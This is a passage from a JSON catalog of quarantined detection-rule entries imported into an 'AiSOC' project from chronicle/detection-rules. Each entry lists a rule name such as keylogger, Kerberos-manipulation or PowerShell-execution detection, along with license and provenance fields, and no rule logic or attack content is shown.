"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_batch_written.yaral" } }, { "id": "chronicle-detection-rules-info-file-iso-mounted", "type": "detection", "name": "info_file_iso_mounted", "description": "info_file_iso_mounted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-iso-mounted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_iso_mounted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_iso_mounted.yaral" } }, { "id": "chronicle-detection-rules-info-file-iso-written", "type": "detection", "name": "info_file_iso_written", "description": "info_file_iso_written", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-iso-written.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_iso_written", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", 
"upstream_path": "rules/_deprecated/info/file_iso_written.yaral" } }, { "id": "chronicle-detection-rules-info-file-javascript-created", "type": "detection", "name": "info_file_javascript_created", "description": "info_file_javascript_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-javascript-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_javascript_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_javascript_created.yaral" } }, { "id": "chronicle-detection-rules-info-file-javascript-executed", "type": "detection", "name": "info_file_javascript_executed", "description": "info_file_javascript_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-javascript-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_javascript_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/info/file_javascript_executed.yaral" } }, { "id": "chronicle-detection-rules-info-file-powershell-created", "type": "detection", "name": "info_file_powershell_created", "description": "info_file_powershell_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-powershell-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_powershell_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_powershell_created.yaral" } }, { "id": "chronicle-detection-rules-info-file-powershell-executed", "type": "detection", "name": "info_file_powershell_executed", "description": "info_file_powershell_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-powershell-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_powershell_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/info/file_powershell_executed.yaral" } }, { "id": "chronicle-detection-rules-info-file-read-by-full-path", "type": "detection", "name": "info_file_read_by_full_path", "description": "info_file_read_by_full_path", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-read-by-full-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_read_by_full_path", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_read_by_full_path.yaral" } }, { "id": "chronicle-detection-rules-info-file-vbscript-created", "type": "detection", "name": "info_file_vbscript_created", "description": "info_file_vbscript_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-vbscript-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_vbscript_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/info/file_vbscript_created.yaral" } }, { "id": "chronicle-detection-rules-info-file-vbscript-executed", "type": "detection", "name": "info_file_vbscript_executed", "description": "info_file_vbscript_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-vbscript-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_vbscript_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_vbscript_executed.yaral" } }, { "id": "chronicle-detection-rules-info-file-write-by-hash", "type": "detection", "name": "info_file_write_by_hash", "description": "info_file_write_by_hash", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-write-by-hash.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_write_by_hash", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/info/file_write_by_hash.yaral" } }, { "id": "chronicle-detection-rules-info-http-exact-url", "type": "detection", "name": "info_http_exact_url", "description": "info_http_exact_url", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-http-exact-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_http_exact_url", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/http_exact_url.yaral" } }, { "id": "chronicle-detection-rules-info-http-gate", "type": "detection", "name": "info_http_gate", "description": "info_http_gate", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-http-gate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_http_gate", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/http_gate.yaral" } }, { "id": "chronicle-detection-rules-info-http-user-agent", "type": "detection", "name": 
"info_http_user_agent", "description": "info_http_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-http-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_http_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/http_user_agent.yaral" } }, { "id": "chronicle-detection-rules-info-ip-address-resolution", "type": "detection", "name": "info_ip_address_resolution", "description": "info_ip_address_resolution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-ip-address-resolution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_ip_address_resolution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/ip_address_resolution.yaral" } }, { "id": "chronicle-detection-rules-info-usb-new-device", "type": "detection", "name": "info_usb_new_device", "description": "info_usb_new_device", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-usb-new-device.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_usb_new_device", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/usb_new_device.yaral" } }, { "id": "chronicle-detection-rules-info-wscript-copied-or-moved", "type": "detection", "name": "info_wscript_copied_or_moved", "description": "info_wscript_copied_or_moved", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-wscript-copied-or-moved.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_wscript_copied_or_moved", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/wscript_copied_or_moved.yaral" } }, { "id": "chronicle-detection-rules-info-wscript-executed", "type": "detection", "name": "info_wscript_executed", "description": "info_wscript_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-wscript-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_wscript_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/wscript_executed.yaral" } }, { "id": "chronicle-detection-rules-invocation-of-active-directory-diagnostic-tool-ntdsutilexe", "type": "detection", "name": "invocation_of_active_directory_diagnostic_tool_ntdsutilexe", "description": "invocation_of_active_directory_diagnostic_tool_ntdsutilexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/invocation-of-active-directory-diagnostic-tool-ntdsutilexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "invocation_of_active_directory_diagnostic_tool_ntdsutilexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/active_directory_security/process_creation/invocation_of_active_directory_diagnostic_tool__ntdsutil_exe.yaral" } }, { "id": 
"chronicle-detection-rules-ioc-domain-c2", "type": "detection", "name": "ioc_domain_C2", "description": "ioc_domain_C2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-domain-c2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_domain_C2", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_domain_C2.yaral" } }, { "id": "chronicle-detection-rules-ioc-domain-internal-policy", "type": "detection", "name": "ioc_domain_internal_policy", "description": "ioc_domain_internal_policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-domain-internal-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_domain_internal_policy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_domain_internal_policy.yaral" } }, { "id": "chronicle-detection-rules-ioc-hash-prevalence", "type": "detection", "name": 
"ioc_hash_prevalence", "description": "ioc_hash_prevalence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-hash-prevalence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_hash_prevalence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_hash_prevalence.yaral" } }, { "id": "chronicle-detection-rules-ioc-ip-target", "type": "detection", "name": "ioc_ip_target", "description": "ioc_ip_target", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-ip-target.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_ip_target", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_ip_target.yaral" } }, { "id": "chronicle-detection-rules-ioc-sha256-hash", "type": "detection", "name": "ioc_sha256_hash", "description": "ioc_sha256_hash", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-sha256-hash.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_sha256_hash", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_sha256_hash.yaral" } }, { "id": "chronicle-detection-rules-ioc-sha256-hash-vt", "type": "detection", "name": "ioc_sha256_hash_vt", "description": "ioc_sha256_hash_vt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-sha256-hash-vt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_sha256_hash_vt", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_sha256_hash_vt.yaral" } }, { "id": "chronicle-detection-rules-ip-target-prevalence", "type": "detection", "name": "ip_target_prevalence", "description": "ip_target_prevalence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": 
false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ip-target-prevalence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ip_target_prevalence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ip_target_prevalence.yaral" } }, { "id": "chronicle-detection-rules-judgement-panda-exfil-activity", "type": "detection", "name": "judgement_panda_exfil_activity", "description": "judgement_panda_exfil_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/judgement-panda-exfil-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "judgement_panda_exfil_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/judgement_panda_exfil_activity.yaral" } }, { "id": "chronicle-detection-rules-kerberos-manipulation", "type": "detection", "name": "kerberos_manipulation", "description": "kerberos_manipulation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": 
false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/kerberos-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "kerberos_manipulation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/kerberos_manipulation.yaral" } }, { "id": "chronicle-detection-rules-keylogger-detector-sysmon", "type": "detection", "name": "keylogger_detector_sysmon", "description": "keylogger_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/keylogger-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "keylogger_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/keylogger_detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-kingminer-cryptojacker-sysmon", "type": "detection", "name": "kingminer_cryptojacker_sysmon", "description": "kingminer_cryptojacker_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, 
"playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/kingminer-cryptojacker-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "kingminer_cryptojacker_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/kingminer_cryptojacker__sysmon.yaral" } }, { "id": "chronicle-detection-rules-klist-purge", "type": "detection", "name": "klist_purge", "description": "klist_purge", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/klist-purge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "klist_purge", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/klist_purge.yaral" } }, { "id": "chronicle-detection-rules-kovter-malware-detector-sysmon-behavior", "type": "detection", "name": "kovter_malware_detector_sysmon_behavior", "description": "kovter_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, 
"playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/kovter-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "kovter_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/kovter_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-lazarus-attack-variant", "type": "detection", "name": "lazarus_attack_variant", "description": "lazarus_attack_variant", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lazarus-attack-variant.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lazarus_attack_variant", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/lazarus_attack_variant.yaral" } }, { "id": "chronicle-detection-rules-local-accounts-discovery", "type": "detection", "name": "local_accounts_discovery", "description": "local_accounts_discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/local-accounts-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "local_accounts_discovery", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/local_accounts_discovery.yaral" } }, { "id": "chronicle-detection-rules-loda-rat-detection", "type": "detection", "name": "loda_rat_detection", "description": "loda_rat_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/loda-rat-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "loda_rat_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/loda_rat_detection.yaral" } }, { "id": "chronicle-detection-rules-logins-from-terminated-employees", "type": "detection", "name": "logins_from_terminated_employees", "description": "logins_from_terminated_employees", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/logins-from-terminated-employees.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "logins_from_terminated_employees", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/authentication/logins_from_terminated_employees.yaral" } }, { "id": "chronicle-detection-rules-logon-scripts-userinitmprlogonscript", "type": "detection", "name": "logon_scripts_userinitmprlogonscript", "description": "logon_scripts_userinitmprlogonscript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/logon-scripts-userinitmprlogonscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "logon_scripts_userinitmprlogonscript", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/logon_scripts__userinitmprlogonscript.yaral" } }, { "id": "chronicle-detection-rules-lojack-doubleagent-communication", "type": "detection", "name": "lojack_doubleagent_communication", "description": "lojack_doubleagent_communication", 
